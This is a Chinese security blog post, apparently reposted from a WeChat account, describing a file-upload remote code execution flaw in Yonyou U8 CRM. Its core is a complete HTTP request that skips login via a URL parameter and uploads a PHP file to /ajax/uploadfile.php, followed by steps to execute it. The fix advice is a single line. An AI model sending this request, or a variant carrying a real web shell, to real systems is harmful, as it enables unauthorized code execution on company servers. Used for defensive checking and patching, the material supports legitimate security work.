用友U8 CRM 文件上传RCE漏洞

2024年5月25日00:12:37评论6 views字数 1132阅读3分46秒阅读模式

声明

用友U8 CRM 文件上传RCE漏洞

文章仅用作网络安全人员对自己网站、服务器等进行自查检测，不可用于其他用途，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作，由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任。切勿用于网络攻击，后果自负！！！

用友U8 CRM 文件上传RCE漏洞

用友U8-CRM

0.0

用友U8 CRM 文件上传RCE漏洞

漏洞描述

用友U8 CRM是一款集成了客户关系管理(CRM)功能的的企业资源规划(ERP)软件，广泛应用于中大型企业。该软件提供了uploadfile文件上传功能，允许用户上传文件到服务器上。然而，在某些版本中，用友U8 CRM的uploadfile.php文件上传功能存在安全漏洞，导致远程代码执行(RCE)攻击。

用友U8 CRM 文件上传RCE漏洞

漏洞详情

漏洞URL：/ajax/uploadfile.php

漏洞参数：NULL

漏洞详情：

1、打开自己CRM系统

用友U8 CRM 文件上传RCE漏洞

2、使用以下数据包进行验证

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1Host: 127.0.0.1:8072User-Agent: Mozilla/5.0 (X11; U; Linux x86_64) Gecko/20162404 Firefox/108.0esrContent-Length: 316Connection: closeContent-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6ttAccept-Encoding: gzip, deflate------WebKitFormBoundarydRVCGWq4Cx3Sq6ttContent-Disposition: form-data; name="file"; filename="risk.php "Content-Type: application/octet-stream<?php echo "risk";?>------WebKitFormBoundarydRVCGWq4Cx3Sq6ttContent-Disposition: form-data; name="upload"upload------WebKitFormBoundarydRVCGWq4Cx3Sq6tt--

3、存在漏洞就会返回漏洞URL

用友U8 CRM 文件上传RCE漏洞

4、访问返回的文件成功上传文件并执行

用友U8 CRM 文件上传RCE漏洞

END

用友U8 CRM 文件上传RCE漏洞

修复建议

升级到最新版本。

用友U8 CRM 文件上传RCE漏洞

平安喜乐

用友U8 CRM 文件上传RCE漏洞

世界上有两个我，一个想回家，一个想远行，一个举杯邀明月，一个跪地捡碎银，一个青衣白马徐凤年，一个烟火人间轻人言，一个在文字里，白马青山慢慢行，一个在生活里，蝇营狗苟兀穷年！。

用友U8 CRM 文件上传RCE漏洞

END

原文始发于微信公众号（小羊安全屋）：用友U8 CRM 文件上传RCE漏洞

左青龙
微信扫一扫

右白虎
微信扫一扫

用友U8 CRM 文件上传RCE漏洞

悦库企业网盘SQL注入漏洞

SolarWinds Serv-U FTP 目录遍历文件读取漏洞（CVE-2024-28995）

Rejetto HTTP File Server 远程代码执行漏洞 (CVE-2024-23692)

SolarWinds Serv-U FTP 目录遍历文件读取漏洞(CVE-2024-28995)

SolarWinds Serv-U FTP 目录遍历致文件读取漏洞（CVE-2024-28995）

Magento Open Source XXE漏洞（CVE-2024-34102）

用友分析云存在druid未授权访问漏洞

CVE-2023-42793：TeamCity认证绕过RCE漏洞

CVE-2024-23917：TeamCity认证绕过RCE漏洞

Serv-U FTP 目录遍历（CVE-2024-28995）

发表评论

在线咨询

微信